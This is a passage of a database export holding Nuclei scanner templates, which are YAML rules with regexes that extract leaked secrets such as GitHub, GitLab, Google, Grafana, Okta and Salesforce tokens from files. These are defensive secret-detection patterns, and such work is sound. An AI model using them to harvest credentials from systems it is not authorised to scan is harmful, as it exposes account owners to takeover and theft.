4b0a0048304602210097d39a926e780cd375fdb4adaba3f38cf210fbc9da81445df494d206635403cb022100c7c85a7539d3e8aa0fe0d632358176e1ed6544ca71d770325f5f446070b6c555:922c64590222798bb761d5b6d8e72950", "hash": "988c283bce7376b6aaa7589bcd3b07a6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d47" }, "name": "github-personal-token.yaml", "content": "id: github-personal-token\n\ninfo:\n name: Github Personal Token\n author: geeknik\n severity: high\n tags: file,keys,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"ghp_.{36}\"\n - \"github_pat_.{82}\"\n# digest: 4a0a0047304502203c2ec1412ad731d19d011f31640fed087cbff2458bb3566ef8b6eeab67685fb7022100ff8093aefd8308c39e24dd35a59ced0166d4d5142d2d53104ae639032ca9693f:922c64590222798bb761d5b6d8e72950", "hash": "329b754fd60f3e85ea6271fe98e7c7e3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d48" }, "name": "github-refresh-token.yaml", "content": "id: github-refresh-token\n\ninfo:\n name: Github Refresh Token\n author: 
tanq16\n severity: high\n tags: file,keys,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"ghr_.{76}\"\n# digest: 4a0a0047304502206bdea7a5561d353ecf0a6457d342c940765d8eb423c3755d8333abf20dd73a4c022100bd0ba1e3a2ae3c4a5f075e75be2bf4db20ed798233f99cc306f29b550ec7a054:922c64590222798bb761d5b6d8e72950", "hash": "0ad303f240addbee4e78ab68f9673d9c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d49" }, "name": "gitlab-personal-accesstoken.yaml", "content": "id: gitlab-personal-accesstoken\n\ninfo:\n name: GitLab Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml\n - https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html\n metadata:\n verified: true\n tags: file,keys,gitlab,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(glpat-[0-9a-zA-Z_-]{20})(?:\\b|$)'\n# digest: 4a0a00473045022100d8f81a139d1a55d53b48483cf5f37388a5aa00533518f37e62262ce7d746a8e30220645f888c251b51c3e07bb926d8f51c1bc02d0e34e1970911c9aa95395364078b:922c64590222798bb761d5b6d8e72950", "hash": "43f7ffb65232986e92a11405a4956834", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4a" }, "name": "gitlab-pipeline-triggertoken.yaml", "content": "id: gitlab-pipeline-triggertoken\n\ninfo:\n name: GitLab Pipeline Trigger Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml\n - https://docs.gitlab.com/ee/ci/triggers/\n - https://gitlab.com/gitlab-org/gitlab/-/issues/371396\n - https://gitlab.com/gitlab-org/gitlab/-/issues/388379\n metadata:\n verified: true\n tags: keys,file,gitlab,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(glptt-[0-9a-f]{40})\\b'\n# digest: 
4a0a004730450221008cbf4eb94765a87a19f157f6c0c8c2bdf2065beccbd30d912cc939db48373953022029b0256eda9ca89370a55cd4af46c29517647ada90ad11704cd7dd580313882d:922c64590222798bb761d5b6d8e72950", "hash": "0c273ce716f9bb770b25a0384550f7ac", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4b" }, "name": "gitlab-runner-regtoken.yaml", "content": "id: gitlab-runner-regtoken\n\ninfo:\n name: GitLab Runner Registration Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/gitlab.yml\n - https://docs.gitlab.com/runner/security/\n - https://docs.gitlab.com/ee/security/token_overview.html#runner-registration-tokens-deprecated\n - https://docs.gitlab.com/ee/security/token_overview.html#security-considerations\n metadata:\n verified: true\n tags: keys,file,gitlab,runner,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(GR1348941[0-9a-zA-Z_-]{20})(?:\\b|$)'\n# digest: 4b0a00483046022100d013cf84c226c19433c9eb5d26b3e01b5e8836a0eb5d4ff3b9983b307e6e198b022100ee983342a74bf1953a0bdeaeb6f39798c018ad2ac2e23c3075f35ff0b5186010:922c64590222798bb761d5b6d8e72950", "hash": "f87e83116e3de7fe807a7f6a3ad3b8a3", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4c" }, "name": "google-api.yaml", "content": "id: google-api-key-file\n\ninfo:\n name: Google API key\n author: gaurang\n severity: info\n tags: keys,file,token,google\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"AIza[0-9A-Za-z\\\\-_]{35}\"\n# digest: 4a0a00473045022100d10b8c8ea01d04d065a9d13f5f60048a32c908cc2c5a3f9b4ddcb5ba2f7e823a022039f78018968a42018e32f1a2ccb17df81b9255d14d9094659d95e160eb09eb4a:922c64590222798bb761d5b6d8e72950", "hash": "85c957e5b623f46463b8d86dc4d4a66b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4d" }, "name": "google-clientid.yaml", 
"content": "id: google-clientid\n\ninfo:\n name: Google Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml\n metadata:\n verified: true\n tags: file,keys,google,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)\\b([0-9]+-[a-z0-9_]{32})\\.apps\\.googleusercontent\\.com'\n# digest: 4a0a0047304502204d6ddfacde924e20772b34f26f8f705be85f7bf5bc9078c729a7f7edc99a9dcf022100a64c8e922783d1374f6cbc1f132b56a1efd3de3c59a2ed6ba3d3266225e7ffa4:922c64590222798bb761d5b6d8e72950", "hash": "e17a5e2b8cf444dca67f3959a58d6b6c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4e" }, "name": "google-oauth-clientsecret.yaml", "content": "id: google-oauth-clientsecret\n\ninfo:\n name: Google OAuth Client Secret (prefixed)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml\n metadata:\n verified: true\n tags: file,keys,google,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(GOCSPX-[a-zA-Z0-9_-]{28})'\n# digest: 4a0a004730450220157b3e82f90478510f0f71167cfa1f517878cfc309707142fa439d38149c8a1a022100a54beacb6de85b38bddad57f4d7090ba367df0825c9c4fbfa165f7cb8ae0d4e9:922c64590222798bb761d5b6d8e72950", "hash": "0c37b9ce1adbf7ba7429b7ac49015e02", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4f" }, "name": "grafana-api-key.yaml", "content": "id: grafana-api-key\n\ninfo:\n name: Grafana API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go\n metadata:\n verified: true\n tags: grafana,file,keys\nfile:\n - extensions:\n - 
all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100f94f26615c01ee3669910469b31e0011b160852246ed76ae9802f34d6be1911c022076cd3f3e6b5257f59db3fb098baf801c44b0a628196d408b70d1765bb646a7c9:922c64590222798bb761d5b6d8e72950\n", "hash": "99f9b461940bf67632dce85f13b95876", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d50" }, "name": "grafana-cloud-api-token.yaml", "content": "id: grafana-cloud-api-token\n\ninfo:\n name: Grafana Cloud API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go\n metadata:\n verified: true\n tags: grafana,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100ac8747d010f2f8ecbbf15e54c1a4f79e1e965927e8077c7e25d72c003adf0d9a02205ec44b2c0ae24af123d96ec3b31d842f77287892e7f1f5a92d08a213dd5af080:922c64590222798bb761d5b6d8e72950\n", "hash": "73b3eeb25e0da99b39baf70b6574be11", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d51" }, "name": "grafana-service-account-token.yaml", "content": "id: grafana-service-account-token\n\ninfo:\n name: Grafana Service Account Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go\n metadata:\n verified: true\n tags: grafana,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: 
body\n regex:\n - (?i)\\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4b0a00483046022100d0d2caaae6ee74a09fb5d24db235ba021d75800eafa6dbc83777ac9213de0eff022100f4dde19703abd7a8925d6b3dbcfa20ac5d7e72e6f670baed1ea04e57e3fdfd5a:922c64590222798bb761d5b6d8e72950\n", "hash": "947852b2edab9cb91b4e585bee0d3f67", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d52" }, "name": "huggingface-user-access.yaml", "content": "id: huggingface-user-access\n\ninfo:\n name: HuggingFace User Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/huggingface.yml\n - https://huggingface.co/docs/hub/security-tokens\n metadata:\n verified: true\n tags: huggingface,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(hf_[a-zA-Z]{34})\\b'\n# digest: 4b0a00483046022100934e5db46a96a95fbd52e60737825b1ed564ae6f42363a5843a5317f25c8b15d0221008fd6451b353118cd6c0b7a054f49e79c36d5c4222658de97e4b5fea6731da789:922c64590222798bb761d5b6d8e72950", "hash": "c84b3e14a3fbc85a0ff50e4ad76c5375", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d53" }, "name": "kubernetes-dockercfg-secret.yaml", "content": "id: kubernetes-dockercfg-secret\n\ninfo:\n name: kubernetes.io/dockercfg Secret\n author: dwisiswant0\n severity: info\n reference:\n - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets\n metadata:\n verified: true\n tags: kubernetes,k8s,file,keys,secret\n\nfile:\n - extensions:\n - yaml\n - yml\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\.dockercfg:\\s+[\"']?e(w|y)[\\w=]+[\"']?\n# digest: 4b0a0048304602210084bb6909a2c7963a555e1075de093962ffd4e4b125d3dd1bb559eccf252e697c022100d2e745493ab0b3a250e96f74744924d34f1cb1cf18b265e81ebba442c3eb52ad:922c64590222798bb761d5b6d8e72950", 
"hash": "c89a5eb4d2d45b32fa613e99f798f748", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d54" }, "name": "kubernetes-dockerconfigjson-secret.yaml", "content": "id: kubernetes-dockerconfigjson-secret\n\ninfo:\n name: kubernetes.io/dockerconfigjson Secret\n author: dwisiswant0\n severity: info\n reference:\n - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets\n metadata:\n verified: true\n tags: kubernetes,k8s,file,keys,secret\n\nfile:\n - extensions:\n - yaml\n - yml\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\.dockerconfigjson:\\s+[\"']?e(w|y)[\\w=]+[\"']?\n# digest: 490a0046304402205837efe22bf2818e0eff1697ee0cfa3f5e769e3c20fa63e1291c6243d921daa202207523ce58ac252a1a71bbbf192eb381aa08631c976b1860127bf5e77441876053:922c64590222798bb761d5b6d8e72950", "hash": "73e98f1e0efb2ba0dbc4ea18f67934e6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d55" }, "name": "linkedin-client.yaml", "content": "id: linkedin-client\n\ninfo:\n name: LinkedIn Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml\n - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications\n metadata:\n verified: true\n tags: linkedin,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)linkedin.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{12,14})\\b\n# digest: 4a0a00473045022100ade417f9932824017914990383cd867a37ba57dd1badc60aa55dac97e73cbf3f02203bb0babcad422204af64f70926c18827b3940c69f909d205f440468d18b0bb31:922c64590222798bb761d5b6d8e72950", "hash": "360286b5986f7bf74706d1b70ad1a784", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d56" }, "name": 
"linkedin-secret.yaml", "content": "id: linkedin-secret\n\ninfo:\n name: LinkedIn Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml\n - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications\n metadata:\n verified: true\n tags: linkedin,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)linkedin.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{16})\\b\n# digest: 4a0a0047304502205def151b767d6270018ea90666e56089b0dde70467ca94489c6ab9ec0b735fe2022100ea3cee5471199b7e21bd6a63b75a667adcddad7281d249e83cbb8eb8cda82fd7:922c64590222798bb761d5b6d8e72950", "hash": "6d501d408c3c8f5e95502706ac453ec9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d57" }, "name": "newrelic-api-service.yaml", "content": "id: newrelic-api-service\n\ninfo:\n name: New Relic API Service Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#user-key\n metadata:\n verified: true\n tags: newrelic,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(nrak-[a-z0-9]{27})\\b\n# digest: 4a0a00473045022100b0305a1f0644ca813e1b1408183fb6100e36a5ccf5716a072f32d60cf9956d7102207b59c7dc0411cc69bf362c9a1035ac73c61bccbabbbfeea75aa3eff7db628214:922c64590222798bb761d5b6d8e72950", "hash": "c850dffea93a4a266cb1cb9aa5c9392b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d58" }, "name": "newrelic-license-non.yaml", "content": 
"id: newrelic-license-non\n\ninfo:\n name: New Relic License Key (non-suffixed)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#license-key\n metadata:\n verified: true\n tags: newrelic,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)associated\\ with\\ your\\ New\\ Relic\\ account\\.\\s+license_key:\\s*([a-f0-9]{40})\\b\n# digest: 4b0a00483046022100cb892d11153aa7205e3a23dab514da50e195f959de8fc957589d622d9ab5cc2b0221008328f65ee06dc78d96499d42170e2fb036cfa2aacb467698c39c672dc53cba96:922c64590222798bb761d5b6d8e72950", "hash": "cee46f147ba1aa267bd612120ad82fc4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d59" }, "name": "newrelic-license.yaml", "content": "id: newrelic-license\n\ninfo:\n name: New Relic License Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#license-key\n metadata:\n verified: true\n tags: newrelic,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b([a-z0-9]{6}[a-f0-9]{30}nral)\\b\n# digest: 4b0a00483046022100e041b8d63bb59009c36c1d2f8b42a95d352acb3c8d0345afae5b908a78ab8f090221009e2de0a5b782aa3b65c7cbf357c0c7cd47497bef6ade233b239afa63ff863fff:922c64590222798bb761d5b6d8e72950", "hash": "8e919a66290e3ae1da870c058fb1b2c4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5a" }, "name": "newrelic-pixie-apikey.yaml", "content": "id: 
newrelic-pixie-apikey\n\ninfo:\n name: New Relic Pixie API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml\n - https://docs.px.dev/reference/admin/api-keys/\n metadata:\n verified: true\n tags: file,keys,newrelic,pixie,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\"\n# digest: 4a0a00473045022100c87ef60160177e4dd9cf059f2a4fb1feb922f1dc810beec9f3153393645edb8d0220317d229ff5d7af76fce023056bc85f19f45ff91efeb256c4fca4137237156ad0:922c64590222798bb761d5b6d8e72950", "hash": "57193e44b062d0103f946505365ab833", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5b" }, "name": "newrelic-pixie-deploykey.yaml", "content": "id: newrelic-pixie-deploykey\n\ninfo:\n name: New Relic Pixie Deploy Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml\n - https://docs.px.dev/reference/admin/api-keys/\n metadata:\n verified: true\n tags: file,keys,newrelic,pixie,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\"\n# digest: 4a0a0047304502203c71b329d4ef2552fb587dfa8d1a5717b95763f35295f0d2cb52eee420376850022100ac94ca2b4d48c633bf969eebd6fcbaff6894322bda4e05bce3129184cbfdd205:922c64590222798bb761d5b6d8e72950", "hash": "6385c3d00c62c6972e0a310530d66cac", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5c" }, "name": "odbc-connection.yaml", "content": "id: odbc-connection\n\ninfo:\n name: ODBC Connection String\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/odbc.yml\n metadata:\n 
verified: true\n tags: odbc,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:User|User\\sId|UserId|Uid)\\s*=\\s*([^\\s;]{3,100})\\s*;[\\ \\t]*.{0,10}[\\ \\t]*(?:Password|Pwd)\\s*=\\s*([^\\t\\ ;]{3,100})\\s*(?:[;]|$)\n# digest: 4a0a004730450221009cdd18eb9c779b2230d9b141a315ef98d1da77f0173be2da4d099c46e3b5c46f02207ae6fac5ccfbcbe6ab6902e3e4431449873bf31680040ec3b616c0e3750e1c4d:922c64590222798bb761d5b6d8e72950", "hash": "dc06075f2af490275a24dc24eba81587", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5d" }, "name": "okta-api.yaml", "content": "id: okta-api\n\ninfo:\n name: Okta API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/okta.yml\n - https://devforum.okta.com/t/api-token-length/5519\n - https://developer.okta.com/docs/guides/create-an-api-token/main/\n metadata:\n verified: true\n tags: okta,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?s)(?:okta|ssws).{0,40}\\b(00[a-z0-9_-]{39}[a-z0-9_])\\b\n# digest: 4b0a0048304602210099f31a1c5cf66963fb04f1f4a78317a1329098914e756d1a97879086ca81de74022100c51328ddf041ad3e06759c5ce691eed371adf63ef1c6d203b2a50d87b165b1f9:922c64590222798bb761d5b6d8e72950", "hash": "4b9ad57ad90b18b09b3e0e200ff3fb07", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5e" }, "name": "particle-access.yaml", "content": "id: particle-access\n\ninfo:\n name: particle.io Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/particle.io.yml\n - https://docs.particle.io/reference/cloud-apis/api/\n metadata:\n verified: true\n tags: particle,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n 
regex:\n - 'https://api\\.particle\\.io/v1/[a-zA-Z0-9_\\-\\s/\"\\\\?]*(?:access_token=|Authorization:\\s*Bearer\\s*)\\b([a-zA-Z0-9]{40})\\b'\n - '(?:access_token=|Authorization:\\s*Bearer\\s*)\\b([a-zA-Z0-9]{40})\\b[\\s\"\\\\]*https://api\\.particle\\.io/v1'\n# digest: 4b0a00483046022100a93af0a2a59859c973d5551ca538c3445e1bbdcdb6ffae6bb511031ab0920b6e022100b5528e182489365a2d48d40ff6ef41f6b79a28fa270c311e4fe6f767e45e4414:922c64590222798bb761d5b6d8e72950", "hash": "d90177006b565c08440c816c334f3f54", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5f" }, "name": "reactapp-password.yaml", "content": "id: reactapp-password\n\ninfo:\n name: React App Password\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml\n - https://create-react-app.dev/docs/adding-custom-environment-variables/\n - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app\n metadata:\n verified: true\n tags: react,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\bREACT_APP(?:_[A-Z0-9]+)*_PASS(?:\\s+WORD)?\\s*=\\s*['\"]?([^\\s'\"$]{6,})(?:[\\s'\"$]|$)\n# digest: 4b0a00483046022100b4791a0989f14242e6ffe187281643b8b1417e5aba7fe98f353e37dbdc2ffb6c022100c3eee981ff792f8372f7f9292d0e73e0718b69a12d6d40ba0a58dff15dc3f948:922c64590222798bb761d5b6d8e72950", "hash": "d0c0375597265ce974c06673019a6414", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d60" }, "name": "reactapp-username.yaml", "content": "id: reactapp-username\n\ninfo:\n name: React App Username\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml\n - https://create-react-app.dev/docs/adding-custom-environment-variables/\n - 
https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app\n metadata:\n verified: true\n tags: react,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\bREACT_APP(?:_[A-Z0-9]+)*_USER(?:\\s+NAME)?\\s*=\\s*['\"]?([^\\s'\"$]{3,})(?:[\\s'\"$]|$)\n# digest: 4a0a0047304502201077003a86f122901374676e5f9dfda39f6c54f870a6e4f12b7dd01707a3a5e2022100c998646fe193fa833a18772b90679efa1ba4cca48a55a2da1c839b79e50b4cfd:922c64590222798bb761d5b6d8e72950", "hash": "9a9f2767d2759460f5a447b3c4b90c49", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d61" }, "name": "salesforce-access.yaml", "content": "id: salesforce-access\n\ninfo:\n name: Salesforce Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/salesforce.yml\n metadata:\n verified: true\n tags: salesforce,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(00[a-zA-Z0-9]{13}![a-zA-Z0-9._]{96})(?:\\b|$|[^a-zA-Z0-9._])\n# digest: 490a0046304402207a4efb9c2401eaa2ebf49fcc5ec4676dfc142a5f5d607777827383c94bf144f102207b75489de473e1c5e3264e2d664fbb87cecbfc5811b20e6ac658fcd3f1415806:922c64590222798bb761d5b6d8e72950", "hash": "2f406ef7f2d8968b4584276c910ad32d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d62" }, "name": "thingsboard-access.yaml", "content": "id: thingsboard-access\n\ninfo:\n name: ThingsBoard Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/thingsboard.yml\n - https://thingsboard.io/docs/paas/reference/http-api/\n - https://thingsboard.io/docs/paas/reference/coap-api/\n metadata:\n verified: true\n tags: thingsboard,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n 
- type: regex\n part: body\n regex:\n - thingsboard\\.cloud/api/v1/([a-z0-9]{20})\n# digest: 4b0a00483046022100e85330533e34d275242ad231bb436951116dabe56acafa94f3db46fca45ed3ae022100a799502b27b8e16f77e8406be58127578dd5f3465dab8b0a2381ee944432c239:922c64590222798bb761d5b6d8e72950", "hash": "79e353d2c98594f7b25b32b377b04fd5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d63" }, "name": "truenas-api.yaml", "content": "id: truenas-api\n\ninfo:\n name: TrueNAS API Key (WebSocket)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/truenas.yml\n - https://www.truenas.com/docs/api/core_websocket_api.html\n - https://www.truenas.com/docs/api/scale_rest_api.html\n - https://www.truenas.com/docs/scale/scaletutorials/toptoolbar/managingapikeys/\n - https://www.truenas.com/docs/scale/scaleclireference/auth/cliapikey/\n - https://www.truenas.com/docs/scale/api/\n - https://www.truenas.com/community/threads/api-examples-in-perl-python.108053/\n metadata:\n verified: true\n tags: truenas,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\"params\"\\s*:\\s*\\[\\s*\"(\\d+-[a-zA-Z0-9]{64})\"\\s*\\]'\n# digest: 490a0046304402207bb4c8c5d8688099a5fb0972662080602259b4356fa5f947f6bf7ace68af235702201273f66e211b1ddfafc26dd957bc970aa1b23f7c0de5c142347e4d83f5ce1b49:922c64590222798bb761d5b6d8e72950", "hash": "cfc8c228b1928d302835f1bf246b6560", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d64" }, "name": "twitter-client.yaml", "content": "id: twitter-client\n\ninfo:\n name: Twitter Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml\n - https://developer.twitter.com/en/docs/authentication/overview\n metadata:\n verified: true\n tags: 
